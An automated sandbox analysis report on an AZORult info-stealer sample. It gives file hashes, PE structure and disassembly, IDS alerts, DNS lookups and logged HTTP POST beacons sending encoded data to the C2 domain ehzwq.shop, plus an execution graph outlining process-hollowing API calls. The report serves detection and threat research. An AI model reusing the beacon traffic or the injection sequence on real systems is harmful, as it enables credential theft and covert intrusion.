                • VT rate limit hit for: UoktqWamLR.exe
                No simulations
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                45.77.249.79RgZaLjgCto.exeGet hashmaliciousTinbaBrowse
                • uyhgqunqkxnx.pw/EiDQjNbWEQ/
                java.exeGet hashmaliciousTinbaBrowse
                • uyhgqunqkxnx.pw/EiDQjNbWEQ/
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                ehzwq.shopModifications_List.oneGet hashmaliciousAZORultBrowse
                • 172.67.162.36
                kahyts.exeGet hashmaliciousGuLoaderBrowse
                • 172.67.162.36
                HSBC_PAYMENT.exeGet hashmaliciousAzorult, GuLoaderBrowse
                • 172.67.162.36
                Apixaban _August 2024.exeGet hashmaliciousAzorult, GuLoaderBrowse
                • 104.21.10.25
                IMG79600253.exeGet hashmaliciousAzorult, PureLog StealerBrowse
                • 111.90.143.196
                Synarmogoidea.exeGet hashmaliciousRemcos, GuLoaderBrowse
                • 172.67.162.36
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                AS-CHOOPAUSclient.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                • 95.179.246.167
                AUG 2024 SOA.exeGet hashmaliciousFormBookBrowse
                • 104.207.148.137
                file.exeGet hashmaliciousLummaC, Amadey, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer, RedLineBrowse
                • 95.179.250.45
                DN.exeGet hashmaliciousFormBookBrowse
                • 104.207.148.137
                154.213.187.80-arm-2024-08-30T23_29_44.elfGet hashmaliciousMiraiBrowse
                • 204.80.154.118
                SecuriteInfo.com.Win32.TrojanX-gen.12944.32631.exeGet hashmaliciousLummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog StealerBrowse
                • 95.179.250.45
                mirai.arm.elfGet hashmaliciousMiraiBrowse
                • 207.148.95.53
                OmnqazpM3P.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, Stealc, VidarBrowse
                • 95.179.250.45
                wfJfUGeGT3.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine, XWorm, zgRATBrowse
                • 95.179.163.21
                Iv7oa1Q1P1.exeGet hashmaliciousXenoRATBrowse
                • 155.138.205.64
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                37f463bf4616ecd445d4a1937da06e19bcBUSLgrmY.exeGet hashmaliciousUnknownBrowse
                • 45.77.249.79
                bcBUSLgrmY.exeGet hashmaliciousUnknownBrowse
                • 45.77.249.79
                1.ps1Get hashmaliciousUnknownBrowse
                • 45.77.249.79
                FileApp.exeGet hashmaliciousLummaC, PureLog Stealer, RedLine, Stealc, Vidar, Xmrig, zgRATBrowse
                • 45.77.249.79
                9iv4fU9AVx.exeGet hashmaliciousGuLoaderBrowse
                • 45.77.249.79
                51T93e7bGc.exeGet hashmaliciousGuLoaderBrowse
                • 45.77.249.79
                Camperede.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                • 45.77.249.79
                SecuriteInfo.com.Win64.MalwareX-gen.12960.26657.exeGet hashmaliciousUnknownBrowse
                • 45.77.249.79
                PO-5109542537.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                • 45.77.249.79
                VDF645425140#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                • 45.77.249.79
                No context
                No created / dropped files found
                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):7.831376323923726
                TrID:
                • Win32 Executable (generic) a (10002005/4) 99.94%
                • Win16/32 Executable Delphi generic (2074/23) 0.02%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • VXD Driver (31/22) 0.00%
                File name:UoktqWamLR.exe
                File size:1'069'056 bytes
                MD5:97cc0e7d7caa3483e4c5e5cff9fbe67e
                SHA1:e74e03ad3d8f52ce5858a5e8208343fa04a2b367
                SHA256:65e1b5713b271302e96bab80440f744c13c953749562603ea3ee03eda880f9ea
                SHA512:320b84be5ade8681a0be7bd862dfa1b65f75189cc95967ed586d9efdb3c68a8f243861c399339b42f9688561c2f217a6e9d8e4b2e586a4d4f2f583eca711c357
                SSDEEP:24576:OLPskXqS0jFC6LkpzqPskXqS0jFC6LkpzWoKywypSpbYmb93PK/:QJXUJC6LkpzqJXUJC6LkpzEMSNYmpy/
                TLSH:B63502A1A9F9A630C1951038F964FF6C8A192CE5CE48DE057F3C1F079B61BD2B7A7085
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....y.b.....................p......u>....... ....@.................................|......................................
                Icon Hash:00869eb0b230201f
                Entrypoint:0x4f3e75
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                DLL Characteristics:
                Time Stamp:0x62EB79BF [Thu Aug 4 07:48:15 2022 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:4
                OS Version Minor:0
                File Version Major:4
                File Version Minor:0
                Subsystem Version Major:4
                Subsystem Version Minor:0
                Import Hash:67d5cc60f9a80cf612cceb6c4d2f15fe
                Instruction
                jmp 00007F2C407CB94Bh
                add byte ptr [esi+12FB4C95h], al
                div bh
                adc eax, 7372553Fh
                jnle 00007F2C408BE549h
                jnl 00007F2C408BE56Fh
                insb
                jns 00007F2C408BE4CDh
                pop dword ptr [ebx]
                retf BA51h
                jecxz 00007F2C408BE4DFh
                imul eax, dword ptr [ebp+68355991h], B5h
                fld st(0), st(3)
                rcr byte ptr [edx+4Fh], cl
                sub eax, C82B3261h
                sub eax, FF7674D1h
                out dx, eax
                pop es
                ficom dword ptr [ecx+ebp*4-4323672Ch]
                sbb eax, B9D13E9Ah
                push ecx
                shr dword ptr [ebx+edx*2-53845915h], 1
                movsb
                cli
                adc esi, edx
                int1
                test byte ptr [7AB0D376h], bl
                or al, 0Bh
                xlatb
                and al, 60h
                mov word ptr [esi+49D4DBA2h], seg?
                dec byte ptr [eax+ebp*2]
                in eax, dx
                add dword ptr [esi+esi*8-0Ah], 565FDB8Eh
                aad 6Ah
                cli
                loope 00007F2C408BE4D1h
                bswap ebp
                pop dword ptr [38BDD5ABh]
                daa
                inc edi
                push FFFFFFBCh
                lodsb
                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IMPORT0x1024c00x3c.rdata
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x1080000x8b4.rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x1020000x1bc.rdata
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                .text0x10000x100fc40x101000c4566aa655f60351d3dbac95d79761dbFalse0.8666118221060312data7.8724464732051125IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                .rdata0x1020000xc740x10007ad9d40f7ccfbd00e1362c73d0bffe1aFalse0.306640625data4.19207049615358IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .data0x1030000x44480x1000620f0b67a91f7f74151bc5be745b7110False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .rsrc0x1080000x8b40x1000a91760e51b488969668964180d93d0b7False0.1640625data1.889714708388577IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                NameRVASizeTypeLanguageCountryZLIB Complexity
                RT_ICON0x1087840x130Device independent bitmap graphic, 32 x 64 x 1, image size 2560.3223684210526316
                RT_ICON0x10849c0x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 6400.19623655913978494
                RT_ICON0x1083740x128Device independent bitmap graphic, 16 x 32 x 4, image size 1920.4155405405405405
                RT_GROUP_ICON0x1083440x30data1.0
                RT_VERSION0x1081500x1f4dataGermanGermany0.5
                DLLImport
                KERNEL32.DLLGetProcAddress, VirtualAlloc, GetModuleHandleW
                MSVBVM60.DLL__vbaVarSub, __vbaStrI2, _CIcos, _adj_fptan, __vbaVarMove, __vbaVarVargNofree, __vbaFreeVar, __vbaAryMove, __vbaLineInputStr, __vbaStrVarMove, __vbaLenBstr, __vbaFreeVarList, _adj_fdiv_m64, __vbaNextEachVar, __vbaFreeObjList, _adj_fprem1, __vbaStrCat, __vbaSetSystemError, __vbaHresultCheckObj, __vbaLenVar, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaRefVarAry, __vbaBoolVarNull, _CIsin, __vbaVargVarMove, __vbaVarZero, __vbaVarCmpGt, __vbaChkstk, __vbaFileClose, EVENT_SINK_AddRef, __vbaStrCmp, __vbaVarTstEq, DllFunctionCall, __vbaVarOr, __vbaRedimPreserve, _adj_fpatan, __vbaRedim, EVENT_SINK_Release, __vbaNew, _CIsqrt, EVENT_SINK_QueryInterface, __vbaStr2Vec, __vbaExceptHandler, __vbaStrToUnicode, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, __vbaUbound, __vbaVarCat, _CIlog, __vbaFileOpen, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaI4Var, __vbaAryLock, __vbaVarAdd, __vbaStrToAnsi, __vbaVarDup, __vbaVarCopy, __vbaVarLateMemCallLd, _CIatan, __vbaStrMove, __vbaCastObj, __vbaR8IntI4, __vbaStrVarCopy, __vbaForEachVar, _allmul, _CItan, __vbaAryUnlock, _CIexp, __vbaFreeStr, __vbaFreeObj
                Language of compilation systemCountry where language is spokenMap
                GermanGermany
                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                2024-09-05T10:21:53.608256+02002016858ET MALWARE Generic - POST To .php w/Extended ASCII Characters (Likely Zeus Derivative)1192.168.2.54970745.77.249.79443TCP
                2024-09-05T10:22:12.936290+02002822521ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner)145.77.249.79443192.168.2.549704TCP
                2024-09-05T10:22:13.752816+02002029465ET MALWARE Win32/AZORult V3.2 Client Checkin M151192.168.2.54970445.77.249.79443TCP
                2024-09-05T10:22:13.752816+02002810276ETPRO MALWARE AZORult CnC Beacon M11192.168.2.54970445.77.249.79443TCP
                TimestampSource PortDest PortSource IPDest IP
                Sep 5, 2024 10:22:11.326294899 CEST49704443192.168.2.545.77.249.79
                Sep 5, 2024 10:22:11.326359987 CEST4434970445.77.249.79192.168.2.5
                Sep 5, 2024 10:22:11.326598883 CEST49704443192.168.2.545.77.249.79
                Sep 5, 2024 10:22:11.339844942 CEST49704443192.168.2.545.77.249.79
                Sep 5, 2024 10:22:11.339904070 CEST4434970445.77.249.79192.168.2.5
                Sep 5, 2024 10:22:12.800450087 CEST4434970445.77.249.79192.168.2.5
                Sep 5, 2024 10:22:12.800571918 CEST49704443192.168.2.545.77.249.79
                Sep 5, 2024 10:22:12.936258078 CEST49704443192.168.2.545.77.249.79
                Sep 5, 2024 10:22:12.936290026 CEST4434970445.77.249.79192.168.2.5
                Sep 5, 2024 10:22:12.936640024 CEST4434970445.77.249.79192.168.2.5
                Sep 5, 2024 10:22:12.936697960 CEST49704443192.168.2.545.77.249.79
                Sep 5, 2024 10:22:12.939150095 CEST49704443192.168.2.545.77.249.79
                Sep 5, 2024 10:22:12.980509996 CEST4434970445.77.249.79192.168.2.5
                Sep 5, 2024 10:22:13.752841949 CEST4434970445.77.249.79192.168.2.5
                Sep 5, 2024 10:22:13.752918005 CEST49704443192.168.2.545.77.249.79
                Sep 5, 2024 10:22:13.752923965 CEST4434970445.77.249.79192.168.2.5
                Sep 5, 2024 10:22:13.752978086 CEST49704443192.168.2.545.77.249.79
                Sep 5, 2024 10:22:13.753051043 CEST49704443192.168.2.545.77.249.79
                Sep 5, 2024 10:22:13.753072023 CEST4434970445.77.249.79192.168.2.5
                Sep 5, 2024 10:22:13.753088951 CEST49704443192.168.2.545.77.249.79
                Sep 5, 2024 10:22:13.753118038 CEST49704443192.168.2.545.77.249.79
                Sep 5, 2024 10:22:14.432338953 CEST49707443192.168.2.545.77.249.79
                Sep 5, 2024 10:22:14.432388067 CEST4434970745.77.249.79192.168.2.5
                Sep 5, 2024 10:22:14.432488918 CEST49707443192.168.2.545.77.249.79
                Sep 5, 2024 10:22:14.432540894 CEST49707443192.168.2.545.77.249.79
                Sep 5, 2024 10:22:14.432549000 CEST4434970745.77.249.79192.168.2.5
                Sep 5, 2024 10:22:14.432657003 CEST4434970745.77.249.79192.168.2.5
                TimestampSource PortDest PortSource IPDest IP
                Sep 5, 2024 10:22:10.652878046 CEST5752853192.168.2.51.1.1.1
                Sep 5, 2024 10:22:11.316706896 CEST53575281.1.1.1192.168.2.5
                Sep 5, 2024 10:22:13.768757105 CEST4948753192.168.2.51.1.1.1
                Sep 5, 2024 10:22:14.431514025 CEST53494871.1.1.1192.168.2.5
                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                Sep 5, 2024 10:22:10.652878046 CEST192.168.2.51.1.1.10xb558Standard query (0)ehzwq.shopA (IP address)IN (0x0001)false
                Sep 5, 2024 10:22:13.768757105 CEST192.168.2.51.1.1.10xcb9bStandard query (0)ehzwq.shopA (IP address)IN (0x0001)false
                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                Sep 5, 2024 10:22:11.316706896 CEST1.1.1.1192.168.2.50xb558No error (0)ehzwq.shop45.77.249.79A (IP address)IN (0x0001)false
                Sep 5, 2024 10:22:11.316706896 CEST1.1.1.1192.168.2.50xb558No error (0)ehzwq.shop178.62.201.34A (IP address)IN (0x0001)false
                Sep 5, 2024 10:22:14.431514025 CEST1.1.1.1192.168.2.50xcb9bNo error (0)ehzwq.shop45.77.249.79A (IP address)IN (0x0001)false
                Sep 5, 2024 10:22:14.431514025 CEST1.1.1.1192.168.2.50xcb9bNo error (0)ehzwq.shop178.62.201.34A (IP address)IN (0x0001)false
                • ehzwq.shop
                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.54970745.77.249.794436164C:\Users\user\Desktop\UoktqWamLR.exe
                TimestampBytes transferredDirectionData
                Sep 5, 2024 10:22:14.432540894 CEST326OUTPOST /erd/mac/index.php HTTP/1.0
                Host: ehzwq.shop
                Connection: close
                User-agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                Content-Length: 101
                Data Raw: 4a 4c ef bf bd 28 39 ef bf bd 4c 2f ef bf bd 39 2f ef bf bd 39 4f ef bf bd 3f 4e ef bf bd 3e 3c ef bf bd 3e 33 ef bf bd 3e 3e ef bf bd 3e 3b ef bf bd 3e 3e ef bf bd 3e 33 ef bf bd 3e 3a ef bf bd 3e 3d ef bf bd 3f 4e ef bf bd 28 39 ef bf bd 28 39 ef bf bd 28 39 ef bf bd 28 39 ef bf bd 4b 2f ef bf bd 3d 4c ef bf bd 3f 4e ef bf bd 4b 4b ef bf bd 28 39 ef bf bd 28 39 ef bf bd 4c 2f ef bf bd 3a 2f ef bf bd 49 2f ef bf bd 3f 4f ef bf bd 3e 33 ef bf bd 3e 38 ef bf bd 28 39 ef bf bd 49 2f ef bf bd 39 4b
                Data Ascii: JL(9L/9/9O?N><>3>>>;>>>3>:>=?N(9(9(9(9K/=L?NKK(9(9L/:/I/?O>3>8(9I/9K


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.54970445.77.249.794436164C:\Users\user\Desktop\UoktqWamLR.exe
                TimestampBytes transferredDirectionData
                2024-09-05 08:22:12 UTC165OUTPOST /erd/mac/index.php HTTP/1.1
                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                Host: ehzwq.shop
                Content-Length: 101
                Cache-Control: no-cache
                2024-09-05 08:22:12 UTC101OUTData Raw: 4a 4c 89 28 39 ff 4c 2f fb 39 2f fb 39 4f ed 3f 4e ed 3e 3c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 ff 28 39 fd 28 39 fe 28 39 fe 4b 2f fb 3d 4c ed 3f 4e 8a 4b 4b 8d 28 39 fe 28 39 fe 4c 2f fb 3a 2f fa 49 2f fb 3f 4f ed 3e 33 ed 3e 38 8e 28 39 fe 49 2f fb 39 4b
                Data Ascii: JL(9L/9/9O?N><>3>>>;>>>3>:>=?N(9(9(9(9K/=L?NKK(9(9L/:/I/?O>3>8(9I/9K
                2024-09-05 08:22:13 UTC94INHTTP/1.1 200 OK
                Date: Thu, 05 Sep 2024 08:22:13 GMT
                Content-Length: 0
                Connection: close


                Click to jump to process

                Click to jump to process

                Click to dive into process behavior distribution

                Click to jump to process

                Target ID:0
                Start time:04:21:57
                Start date:05/09/2024
                Path:C:\Users\user\Desktop\UoktqWamLR.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\UoktqWamLR.exe"
                Imagebase:0x400000
                File size:1'069'056 bytes
                MD5 hash:97CC0E7D7CAA3483E4C5E5CFF9FBE67E
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000000.00000002.2150159771.0000000004A70000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000000.00000002.2150159771.0000000004A70000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Azorult_38fce9ea, Description: unknown, Source: 00000000.00000002.2150159771.0000000004A70000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                • Rule: Azorult_1, Description: Azorult Payload, Source: 00000000.00000002.2150159771.0000000004A70000.00000040.10000000.00040000.00000000.sdmp, Author: kevoreilly
                • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000000.00000003.2147061122.000000000077F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000000.00000003.2147061122.000000000077F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Azorult_38fce9ea, Description: unknown, Source: 00000000.00000003.2147061122.000000000077F000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000000.00000003.2099553622.000000000077E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000000.00000003.2099553622.000000000077E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Azorult_38fce9ea, Description: unknown, Source: 00000000.00000003.2099553622.000000000077E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000000.00000003.2146906626.000000000076E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000000.00000003.2146906626.000000000076E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Azorult_38fce9ea, Description: unknown, Source: 00000000.00000003.2146906626.000000000076E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000000.00000003.2099437786.000000000079B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000000.00000003.2099437786.000000000079B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Azorult_38fce9ea, Description: unknown, Source: 00000000.00000003.2099437786.000000000079B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000000.00000003.2099388481.000000000076B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000000.00000003.2099388481.000000000076B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Azorult_38fce9ea, Description: unknown, Source: 00000000.00000003.2099388481.000000000076B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000000.00000003.2099455436.000000000077E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000000.00000003.2099455436.000000000077E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Azorult_38fce9ea, Description: unknown, Source: 00000000.00000003.2099455436.000000000077E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                Reputation:low
                Has exited:true

                Target ID:2
                Start time:04:22:08
                Start date:05/09/2024
                Path:C:\Users\user\Desktop\UoktqWamLR.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\UoktqWamLR.exe"
                Imagebase:0x400000
                File size:1'069'056 bytes
                MD5 hash:97CC0E7D7CAA3483E4C5E5CFF9FBE67E
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Azorult_38fce9ea, Description: unknown, Source: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                • Rule: Azorult_1, Description: Azorult Payload, Source: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: kevoreilly
                Reputation:low
                Has exited:true

                Reset < >

                  Execution Graph

                  Execution Coverage:31.3%
                  Dynamic/Decrypted Code Coverage:10.3%
                  Signature Coverage:7.4%
                  Total number of Nodes:515
                  Total number of Limit Nodes:66
                  execution_graph 2490 2353113 2491 2353124 2490->2491 2509 23536e4 GetPEB 2491->2509 2493 2353150 2494 23535d8 2493->2494 2495 23536e4 GetPEB 2493->2495 2496 235316e 2495->2496 2496->2494 2497 23532da NtCreateSection 2496->2497 2497->2494 2498 2353311 NtMapViewOfSection 2497->2498 2498->2494 2499 2353339 2498->2499 2500 235349c GetPEB 2499->2500 2504 23533d7 CreateProcessW 2499->2504 2500->2504 2502 23534e2 NtGetContextThread 2503 2353503 NtReadVirtualMemory 2502->2503 2502->2504 2503->2504 2505 2353529 NtWriteVirtualMemory 2503->2505 2504->2494 2504->2502 2505->2504 2506 235354f NtUnmapViewOfSection NtMapViewOfSection 2505->2506 2506->2504 2507 2353583 NtSetContextThread 2506->2507 2507->2504 2508 23535b4 NtResumeThread 2507->2508 2508->2494 2508->2504 2510 23536f9 2509->2510 2510->2493 2511 4a73e0 2512 4a73e9 2511->2512 2513 4a7416 NtQueryInformationProcess 2511->2513 2512->2513 2514 4a73ef 2512->2514 2513->2514 2515 4ffbc3 2516 4ffc02 2515->2516 2527 4ff2b6 2516->2527 2519 4ffc14 __vbaNew2 2520 4ffc23 2519->2520 2521 4ffc31 __vbaNew2 2520->2521 2522 4ffc40 __vbaObjSetAddref 2520->2522 2521->2522 2523 4ffc56 2522->2523 2524 4ffc5c __vbaHresultCheckObj 2523->2524 2525 4ffc6a __vbaFreeObj 2523->2525 2524->2525 2526 4ffc85 2525->2526 2532 4ff1e2 2527->2532 2531 4ff2f8 2531->2519 2531->2520 2633 4a7213 2532->2633 2535 4ff318 2644 4f9f8b __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat 2535->2644 2537 4ff371 2687 4ff241 2537->2687 2541 4ff38d 2543 4ff3a9 __vbaAryLock #644 __vbaAryUnlock 2541->2543 2622 4ffa08 2541->2622 2542 4ffa47 __vbaAryUnlock 2542->2531 2544 4ff3df 2543->2544 2697 4fef43 2544->2697 2546 4ff3f2 __vbaObjSet __vbaObjSetAddref __vbaFreeObj 2708 4a6295 2546->2708 2548 4ff418 __vbaObjSetAddref #644 __vbaFreeObj 2549 4ff449 __vbaObjSetAddref 2548->2549 2548->2622 2710 4fb547 __vbaObjSetAddref 2549->2710 2551 4ff468 __vbaFreeObj 2552 4ff47e 2551->2552 2551->2622 2553 4ff4f9 2552->2553 2789 4ffa60 #595 __vbaVarMove __vbaFreeVarList 2552->2789 2556 4ff552 2553->2556 2856 4fb3b0 2553->2856 2558 4ff5a1 2556->2558 2791 4fc4f4 7 API calls 2556->2791 2560 4ff5ac 2558->2560 2868 4facf6 2558->2868 2563 4ff5fb 2560->2563 2796 4fb375 2560->2796 2568 4fb3b0 3 API calls 2563->2568 2570 4ff653 2563->2570 2564 4ff55d 2564->2558 2567 4ffa60 3 API calls 2564->2567 2565 4ffa60 3 API calls 2569 4ff53f __vbaFreeVar 2565->2569 2573 4ff58e __vbaFreeVar 2567->2573 2574 4ff60f 2568->2574 2866 40b560 2569->2866 2571 4ff6a6 2570->2571 2878 4ffba5 2570->2878 2575 4ff6fe 2571->2575 2579 4fb3b0 3 API calls 2571->2579 2572 4ff5b7 2572->2563 2583 4ffa60 3 API calls 2572->2583 2578 40b560 2573->2578 2574->2570 2585 4ffa60 3 API calls 2574->2585 2581 4ff751 2575->2581 2803 4fc731 14 API calls 2575->2803 2584 4ff59c __vbaSetSystemError 2578->2584 2586 4ff6ba 2579->2586 2631 4ff7a4 2581->2631 2881 4fb2ba __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaI4Str 2581->2881 2588 4ff5e8 __vbaFreeVar 2583->2588 2584->2558 2589 4ff640 __vbaFreeVar 2585->2589 2586->2575 2598 4ffa60 3 API calls 2586->2598 2593 40b560 2588->2593 2597 40b560 2589->2597 2596 4ff5f6 __vbaSetSystemError 2593->2596 2594 4ff966 2605 4ff9d3 #644 2594->2605 2851 40b6e0 2594->2851 2596->2563 2603 4ff64e __vbaSetSystemError 2597->2603 2604 4ff6eb __vbaFreeVar 2598->2604 2600 4ff7cb __vbaAryLock 2885 4fb424 __vbaStrCopy #526 __vbaStrVarMove __vbaStrMove __vbaFreeVar 2600->2885 2601 4ffa60 3 API calls 2607 4ff73e __vbaFreeVar 2601->2607 2603->2570 2610 40b560 2604->2610 2913 4a78c6 2605->2913 2615 40b560 2607->2615 2617 4ff6f9 __vbaSetSystemError 2610->2617 2613 4ff982 __vbaSetSystemError __vbaAryLock 2619 4fb0fc 21 API calls 2613->2619 2614 4ff7f7 8 API calls 2895 4fae72 __vbaVarVargNofree __vbaStrVarVal #644 2614->2895 2621 4ff74c __vbaSetSystemError 2615->2621 2616 4ff9ea #644 2616->2622 2617->2575 2624 4ff9c2 __vbaAryUnlock __vbaFreeVar 2619->2624 2621->2581 2622->2542 2624->2605 2631->2594 2631->2600 2632 4ff919 __vbaSetSystemError __vbaFreeStrList __vbaFreeVar __vbaAryUnlock 2631->2632 2632->2631 2634 4a7235 2633->2634 2642 4a77c9 GetPEB 2634->2642 2636 4a723f 2637 4a72b7 NtProtectVirtualMemory 2636->2637 2638 4a7294 NtAllocateVirtualMemory 2636->2638 2639 4a72b2 __vbaFreeVar 2637->2639 2641 4a72e2 2637->2641 2638->2637 2638->2639 2639->2535 2640 4a737b NtProtectVirtualMemory 2640->2639 2641->2640 2643 4a77db 2642->2643 2643->2636 2914 4ffb2a __vbaVarVargNofree __vbaStrVarVal #644 __vbaFreeStr 2644->2914 2648 4fa09e 62 API calls 2651 4fa3a3 2648->2651 2649 4fa40d __vbaObjSetAddref #644 __vbaFreeObj #644 2921 4a78e3 2649->2921 2650 4fa3ba __vbaAryLock #644 __vbaAryUnlock 2650->2651 2651->2649 2651->2650 2653 4fa44c __vbaAryLock #644 __vbaAryUnlock #644 2922 4a78c6 2653->2922 2655 4fa49c __vbaRedim #644 2923 4a78c6 2655->2923 2657 4fa4df #644 2924 4a78c6 2657->2924 2659 4fa50b __vbaAryLock __vbaStrCat __vbaStrMove __vbaI4Str VirtualProtect 2660 4fa56f __vbaHresultCheckObj 